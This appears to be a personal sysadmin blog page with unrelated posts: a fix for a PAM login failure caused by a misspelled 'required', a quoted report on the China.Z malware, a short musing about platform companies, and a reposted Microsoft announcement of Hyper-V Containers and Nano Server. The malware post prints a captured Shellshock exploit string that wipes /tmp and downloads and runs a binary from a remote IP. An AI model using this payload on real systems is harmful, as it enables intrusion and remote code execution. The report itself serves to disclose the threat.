user local logon fail

I can access my linux from the ssh but failed in local logon with error in /var/log/security as below:

Jun 24 11:19:36 localhost login: pam_unix(login:session): session opened for user root by LOGIN(uid=0)
Jun 24 11:19:36 localhost login: Permission denied

the root reason is the error in /etc/pam.d/login:

[root@VM42 ~]# more /etc/pam.d/login
#%PAM-1.0
auth [user_unknown=ignore success=ok ignore=ignore default=bad] pam_securetty.so
auth       include      system-auth
account    required     pam_nologin.so
account    include      system-auth
password   include      system-auth
# pam_selinux.so close should be the first session rule
session    required     pam_selinux.so close
session    required     pam_loginuid.so
session    optional     pam_console.so
# pam_selinux.so open should only be followed by sessions to be executed in the user context
session    required     pam_selinux.so open
session    required     pam_namespace.so
session    optional     pam_keyinit.so force revoke
session    include      system-auth
-session   optional     pam_ck_connector.so
# add for oracle install
session    reqiured     pam_limits.so

the spell of reqiured is not correct….Correct it,everything goes write…

-EOF-

China.z Malware info

My prod server got a security issue where below show the same case:

From :http://users.jyu.fi/~sapekiis/china-z/index.html

China.Z Malware

Among the daily attacks on my web server, I got a request for the following file (without the line breaks).

() { :; }; /bin/bash -c "
rm -rf /tmp/*;
echo wget http://121.207.230.74:911/24 -O /tmp/China.Z-rpvd >> /tmp/Run.sh;
echo echo By China.Z >> /tmp/Run.sh;
echo chmod 777 /tmp/China.Z-rpvd >> /tmp/Run.sh;
echo /tmp/China.Z-rpvd >> /tmp/Run.sh;
echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;
chmod 777 /tmp/Run.sh;
/tmp/Run.sh
"

It was clearly an attempt to exploit CVE-2014-6271 and friends, colloquially known as Shellshock or Bashdoor. That is not particularly interesting, because the bug was fixed a long time ago and my server does not even support CGI. However some searching revealed that the payload does not seem to be known.

I set up a trap and captured the payload the next time it came by. On a cursory glance it looked like a poorly-written C++ program that was compiled with a 2003 version of GCC on a RHEL machine.

I do not care to dig much deeper, so I am sharing the payload with the world in case someone does. I put the payload and the accompanying the request into an archive. Note that the payload is most definitely harmful and you need to be really careful if you decide to work with it. I removed its execute bits as a precaution, but the rest is on you.

also,you can follow the pages as workround guide:

1.http://www.slideshare.net/hendrikvb/chinaz-analysis-of-a-hack

2.http://blog.malwaremustdie.org/2015/01/mmd-0030-2015-new-elf-malware-on.html

3.http://blog.malwaremustdie.org/2015/06/the-elf-chinaz-reloaded.html

–EOF–

 

Something interesting is happening…

Something interesting is happening…

The world’s largest taxi company owns no vehicles;the world’s most popular media owner creates no content;the most valuable retailer has no inventory;the world’s largest accommodation provider owners no real estate.

the revolution is involving..

interesting is happening

FW:Microsoft Announces New Container Technologies for the Next Generation Cloud

source:http://blogs.technet.com/b/server-cloud/archive/2015/04/08/microsoft-announces-new-container-technologies-for-the-next-generation-cloud.aspx

Guest post by Mike Neil, General Manager for Windows Server, Microsoft

In today’s cloud-first world, businesses increasingly rely on applications to fuel innovation and productivity. As the cloud evolves, containers are emerging as an attractive way for developers to quickly and efficiently build and deploy these applications at the speed of business. Offering developers and IT professionals the ability to deploy applications from a workstation to a server in mere seconds, containers are taking application development to a whole new level.

As developers look to expand the benefits of containers to a broader set of applications, new requirements are emerging. For example, heightened levels of trust may be required for enterprise systems or in hosted environments. Furthermore, developers often deploy into mixed operational environments where they may not have control of the platform where the application is deployed. Virtualization has historically provided a valuable level of isolation that enables these scenarios but there is now opportunity to blend the efficiency and density of the container model with the right level of isolation.

Last October, Microsoft and Docker, Inc. jointly announced plans to bring containers to developers across the Docker and Windows ecosystems via Windows Server Containers, available in the next version of Windows Server. We will be unveiling the first live demonstration in a few weeks, starting at the BUILD conference. Today, we are taking containerization one step further by expanding the scenarios and workloads developers can address with containers:

• Hyper-V Containers, a new container deployment option with enhanced isolation powered by Hyper-V virtualization 
• Nano Server, a minimal footprint installation of Windows Server that is highly optimized for the cloud, and ideal for containers.

First-of-Their-Kind Hyper-V Containers

Leveraging our deep virtualization experience, Microsoft will now offer containers with a new level of isolation previously reserved only for fully dedicated physical or virtual machines, while maintaining an agile and efficient experience with full Docker cross-platform integration. Through this new first-of-its-kind offering, Hyper-V Containers will ensure code running in one container remains isolated and cannot impact the host operating system or other containers running on the same host.

While Hyper-V containers offer an additional deployment option between Windows Server Containers and the Hyper-V virtual machine, you will be able to deploy them using the same development, programming and management tools you would use for Windows Server Containers. In addition, applications developed for Windows Server Containers can be deployed as a Hyper-V Container without modification, providing greater flexibility for operators who need to choose degrees of density, agility, and isolation in a multi-platform, multi-application environment.

Our Containers in the Docker Ecosystem

Docker plays an important part in enabling the container ecosystem across Linux, Windows Server and the forthcoming Hyper-V Containers. We have been working closely with the Docker community to leverage and extend container innovations in Windows Server and Microsoft Azure, including submitting the development of the Docker engine for Windows Server Containers as an open contribution to the Docker repository on GitHub. In addition, we’ve made it easier to deploy the latest Docker engine using Azure extensions to setup a Docker host on Azure Linux VMs and to deploy a Docker-managed VM directly from the Azure Marketplace. Finally, we’ve added integration for Swarm, Machine and Compose into Azure and Hyper-V.

“Microsoft has been a great partner and contributor to the Docker project since our joint announcement in October of 2014,” said Nick Stinemates, Head of Business Development and Technical Alliances. “They have made a number of enhancements to improve the developer experience for Docker on Azure, while making contributions to all aspects of the Docker platform including Docker orchestration tools and Docker Client on Windows. Microsoft has also demonstrated its leadership within the community by providing compelling new content like dockerized .NET for Linux. At the same time, they’ve been working to extend the benefits of Docker containers- application portability to any infrastructure and an accelerated development process–to its Windows developer community.”

Introducing Nano Server: The Nucleus of Modern Apps and Cloud

The operating system has evolved dramatically with the move to the cloud. Many customers today need their OS for the primary purpose of powering born-in-the-cloud applications. Leveraging our years of experience building and running hyper-scale datacenters, Microsoft is uniquely positioned to provide a purpose-built OS to power modern apps and containers.

The result is Nano Server, a minimal footprint installation option of Windows Server that is highly optimized for the cloud, including containers. Nano Server provides just the components you need – nothing else, meaning smaller server images, which reduces deployment times, decreases network bandwidth consumption, and improves uptime and security. This small footprint makes Nano Server an ideal complement for Windows Server Containers and Hyper-V Containers, as well as other cloud-optimized scenarios. A preview will be available in the coming weeks, and you can read more about the technology on the Windows Server blog.

Containers are bringing speed and scale to the next level in today’s cloud-first world. Microsoft is uniquely positioned to propel more organizations forward into the next era of containerization, by offering flexibility and choice through Windows Server containers, Linux containers, and Hyper-V containers both in the cloud and on-premises. Today’s announcements are just the beginning of what’s to come, as we continue to fuel both the growth of containers in the industry, and new levels of application innovation for all developers.

Stay tuned for more details on these new innovations, beginning at our BUILD conference in a few weeks.